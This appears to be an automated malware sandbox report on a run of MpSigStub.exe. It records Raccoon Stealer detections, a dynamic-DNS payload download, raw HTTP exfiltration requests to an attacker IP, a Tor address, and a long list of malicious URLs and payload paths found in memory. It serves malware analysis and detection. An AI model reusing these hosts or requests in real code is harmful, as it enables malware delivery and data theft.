Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\mpavdlta.vdm Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\ Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\1.349.0.0_to_1.351.0.0_mpavbase.vdm._p Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File opened: C:\Windows\SERVIC~1\ Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30AB030 FindNextFileW,FindClose,FindFirstFileW, 18_2_00007FF7E30AB030
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30AADEC FindFirstFileW,FindNextFileW,FindClose,FindClose, 18_2_00007FF7E30AADEC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E30D2504 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 18_2_00007FF7E30D2504
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Code function: 18_2_00007FF7E305F810 FindFirstFileW,FindNextFileW,FindClose,CloseHandle,CloseHandle, 18_2_00007FF7E305F810

Networking:

barindex
Yara detected PasteDownloader
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.11.20:49817 -> 5.181.156.229:80
Source: Traffic Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.11.20:49817 -> 5.181.156.229:80
Found Tor onion address
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: https://djdkduep62kz4nzx.onion.to/
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: $https://djdkduep62kz4nzx.onion.to/
Uses dynamic DNS services
Source: unknown DNS query: name: sopage.duckdns.org
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://sopage.duckdns.org/Solex-RacoonStealer_JCgunCl163.bin
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /teneleven11pro HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: telemirror.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 5.181.156.229
Source: global traffic HTTP traffic detected: GET //l/f/7pUkcnwB3dP17Spz8PbZ/5bb145f546aab946dfee3a86c4ed4aae2eb77748 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 5.181.156.229
Source: global traffic HTTP traffic detected: GET //l/f/7pUkcnwB3dP17Spz8PbZ/32442f5e2baf805844c1826e7816dd9d68ef3ddc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 5.181.156.229
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVContent-Length: 53168Host: 5.181.156.229
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 12 Oct 2021 01:36:36 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /Solex-RacoonStealer_JCgunCl163.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: sopage.duckdns.orgCache-Control: no-cache
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: MIVOCLOUDMD MIVOCLOUDMD
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 23.146.242.85 23.146.242.85
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: HTTP://www.EEEEEEE.EEE
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%%PingRtt%%/t.ashx
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://%76%2E%79%61%6F%36%33%2E%63%6F%6D/url.asp
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://%76%2E%79%61%6F%36%33%2E%63%6F%6D/url.asp%C5%E4%D6%C3%D0%C5%CF%A2
Source: MpSigStub.exe, 0000000B.00000003.18312668027.0000021B5E551000.00000004.00000001.sdmp String found in binary or memory: http://%HOST%/client/install.htm?cid=%CID%
Source: MpSigStub.exe, 0000000B.00000003.18312668027.0000021B5E551000.00000004.00000001.sdmp String found in binary or memory: http://%HOST%/client/open.htm?GUID=%GUID%&cid=%CID%
Source: MpSigStub.exe, 0000000B.00000003.18312668027.0000021B5E551000.00000004.00000001.sdmp String found in binary or memory: http://%HOST%/client/run.htm?GUID=%GUID%&cid=%CID%
Source: MpSigStub.exe, 0000000B.00000003.18312668027.0000021B5E551000.00000004.00000001.sdmp String found in binary or memory: http://%HOST%/client/scan.htm?GUID=%GUID%&cid=%CID%x
Source: MpSigStub.exe, 0000000B.00000003.18312668027.0000021B5E551000.00000004.00000001.sdmp String found in binary or memory: http://%HOST%/client/uninstall.htm?GUID=%GUID%&cid=%CID%
Source: MpSigStub.exe, 0000000B.00000003.18312668027.0000021B5E551000.00000004.00000001.sdmp String found in binary or memory: http://%HOST%/client/update.htm?GUID=%GUID%&cid=%CID%
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%S/upload.php
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://%d.%d.%d.%d:3128/
Source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp String found in binary or memory: http://%d.ctrl.%s
Source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp String found in binary or memory: http://%d.ctrl.%saf
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://%domain%/config.php
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://%domain%/content.php?se_id=%d&q=%s&page=%s&ua=%s&al=%s&aff_id=%s&sub_id=%s
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://%domain%/update.php
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://%domain%/update.phpa
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%s.%s/APP/download.php?m=%s&d=%s&a=%s
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%s.%s/APP/download.php?m=%s&d=%s&a=%sa
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%s.%s/APP/loading.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%s/?aid=%shttp://%s/sync.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%s/any2/%s-direct.ex
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%s/any2/%s-direct.exx
Source: MpSigStub.exe, 0000000B.00000003.18281753919.0000021B5FD9B000.00000004.00000001.sdmp String found in binary or memory: http://%s/asghfd.php?&&u=%u&p=%u&lang
Source: MpSigStub.exe, 0000000B.00000003.18281753919.0000021B5FD9B000.00000004.00000001.sdmp String found in binary or memory: http://%s/asghfd.php?&&u=%u&p=%u&langad
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%s/banner3.php?q=%d.%d.%d.%d.%d.%s.1.%d.%d
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%s/block.phpa
Source: MpSigStub.exe, 0000000B.00000003.18281753919.0000021B5FD9B000.00000004.00000001.sdmp String found in binary or memory: http://%s/buy_online.php
Source: MpSigStub.exe, 0000000B.00000003.18281753919.0000021B5FD9B000.00000004.00000001.sdmp String found in binary or memory: http://%s/buy_online.phpa
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%s/dbk.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%s/dupe.php?q=%d.%d.%d.%d.%d.%s.1.%d
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%s/ex1.php
Source: MpSigStub.exe, 0000000B.00000003.18281753919.0000021B5FD9B000.00000004.00000001.sdmp String found in binary or memory: http://%s/features.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%s/ftp/g.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%s/httpss/setup.php?action=4&mk=%s&aid=%s
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%s/in.php?url=%d&affid=%sg
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: http://%s/in.phpWh
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: http://%s/index.htm?content=%s&id=%d
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: http://%s/index.htm?id=%4d&content=%s
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%s/index.php?drls=87&id=%s&hwid=%s
Source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp String found in binary or memory: http://%s/information.php?a=%s&b=%d&c=%d
Source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp String found in binary or memory: http://%s/information.php?a=%s&b=%d&c=%dxL
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://%s/inspection.aspx?index=stripbooks
Source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp String found in binary or memory: http://%s/js.php?affid=%s&kw=%s
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%s/js3.php?kws=%%s&q=%%s&%%s
Source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp String found in binary or memory: http://%s/kx.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%s/live.php?backupquery=%s
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%s/loads.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%s/loads2.php?r=%s
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://%s/mirror/ret.aspx?content=%s
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%s/nph-update.cgi?%s
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%s/poiehrgb.php?&advid=0000
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%s/r.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%s/search/search.cgi?s
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%s/search/search.cgi?src=autosearch&s=%s
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%s/sp.php?adv=%s&who=S
Source: MpSigStub.exe, 0000000B.00000003.18281753919.0000021B5FD9B000.00000004.00000001.sdmp String found in binary or memory: http://%s/support.php
Source: MpSigStub.exe, 0000000B.00000003.18281753919.0000021B5FD9B000.00000004.00000001.sdmp String found in binary or memory: http://%s/sync.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://%s/uninst2.cgi?affid=%s&ver=%s&iid=%s&grp=%s
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: http://(.-/)
Source: MpSigStub.exe, 0000000B.00000003.18278560090.0000021B5F382000.00000004.00000001.sdmp String found in binary or memory: http://.(www.blackcheta.blogspot.com/)
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://.exeuser32.dll
Source: MpSigStub.exe, 0000000B.00000003.18225498885.0000021B4EEFC000.00000004.00000001.sdmp String found in binary or memory: http://.ocx.cabhtml:file:ftp://
Source: MpSigStub.exe, 0000000B.00000003.18313524013.0000021B5F166000.00000004.00000001.sdmp String found in binary or memory: http://.online/a
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://.zdropp.co.cc/download.php?token=
Source: MpSigStub.exe, 0000000B.00000003.18278560090.0000021B5F382000.00000004.00000001.sdmp String found in binary or memory: http://0-2-t-9-r-6-p-4-4-4-s-0-h-e-.i-k-r-g-1-0-u-5-1-f-3-g-li-9-p-1-x-t-6-g-l-8-m-q-y-s-k-6-l.info
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://0.82211.net/
Source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: http://0147.0131.0133.0174/..----------------------....................-.....................-/.....
Source: MpSigStub.exe, 0000000B.00000003.18281753919.0000021B5FD9B000.00000004.00000001.sdmp String found in binary or memory: http://03ptc6fk0.ru/clogs/index.php?
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: http://103.133.106.72/ini/................wbk
Source: MpSigStub.exe, 0000000B.00000003.18279241647.0000021B5F9D1000.00000004.00000001.sdmp String found in binary or memory: http://103.140.251.93/_....-------------------------.....------------_----/
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://103.149.12.183/bigi.doc
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://103.149.12.183/p1.doc
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://103.149.12.183/u1.doc
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://104.236.94.
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: http://104.243.35.43
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: http://107.170.47.94/mdsatalho/
Source: MpSigStub.exe, 0000000B.00000003.18263377234.0000021B5F335000.00000004.00000001.sdmp String found in binary or memory: http://107.172.130.145/
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://107.173.191.48/deck/m.dot
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://107.173.219.80/
Source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp String found in binary or memory: http://107.189.10.150/ht/
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://108.61.208.60
Source: MpSigStub.exe, 0000000B.00000003.18281753919.0000021B5FD9B000.00000004.00000001.sdmp String found in binary or memory: http://110.42.4.180:
Source: MpSigStub.exe, 0000000B.00000003.18299651733.0000021B5E105000.00000004.00000001.sdmp String found in binary or memory: http://120061996-783405463700123057.preview.editmysite.com/uploads/1/2/0
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://121.14.
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://122.224.9.67/
Source: MpSigStub.exe, 0000000B.00000003.18304834904.0000021B5E504000.00000004.00000001.sdmp String found in binary or memory: http://123support.online/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://123zphimonline.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1/down/list2.txt
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1/tracking?source=
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:20202/remind.html
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:27777/?inj=http://
Source: MpSigStub.exe, 0000000B.00000003.18280918595.0000021B5F1EB000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:8000/web.html?url=yac.mx&rate=501&id=%s&key=%s&pm=1x
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:8081/dial.html?
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:8089/index.html?
Source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:8332
Source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:8545
Source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:9600/IperiusHSa
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://139.162.
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: http://149.3.170.235/qw-fad/
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: http://152.89.218.86/
Source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp String found in binary or memory: http://155.138.254.3/ok.js
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: http://158.255.1.137/1/live.php
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: http://158.255.5.220
Source: MpSigStub.exe, 0000000B.00000003.18266135814.0000021B5EBFB000.00000004.00000001.sdmp String found in binary or memory: http://159.8.31.231/
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: http://164.132.171.89/promo.php
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://170.130.55.135/api.php
Source: MpSigStub.exe, 0000000B.00000003.18279241647.0000021B5F9D1000.00000004.00000001.sdmp String found in binary or memory: http://172.245.119.81/.----------------------.------------------------------.-/s.wbk
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://174.122.240.164/Kc/2331
Source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp String found in binary or memory: http://178.79.137.25/campo/
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://179.43.158.187/PhtJFr0fvBk2.php
Source: MpSigStub.exe, 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp String found in binary or memory: http://184.105.163.238/
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: http://185.14.30.131/api.php
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: http://185.14.31.93/nuzq5lag7htb.php
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: http://185.141.25.168/check_attack/
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18270439860.0000021B5F64D000.00000004.00000001.sdmp String found in binary or memory: http://185.153.198.216:8010/UserService
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: http://185.165.30.31
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: http://185.172.110.217/kvsn/image.png
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp String found in binary or memory: http://185.180.197.66/2vjdz6jaqzeiq.php
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: http://185.22.153.9/desktop-u2u8a6r/nature/
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: http://185.22.153.9/desktop-u2u8a6r/nature/prey.dot
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://185.238.0.233/sed.dllc:
Source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp String found in binary or memory: http://185.243.215.213/sys_info.vbs
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: http://185.250.149.128/
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: http://185.38.142.91/awo/
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: http://185.38.142.91/awo/next.php
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: http://185.82.218.2/
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: http://185.82.218.30/44313
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: http://185.99.2.83/frte1z0xiwu8q.php
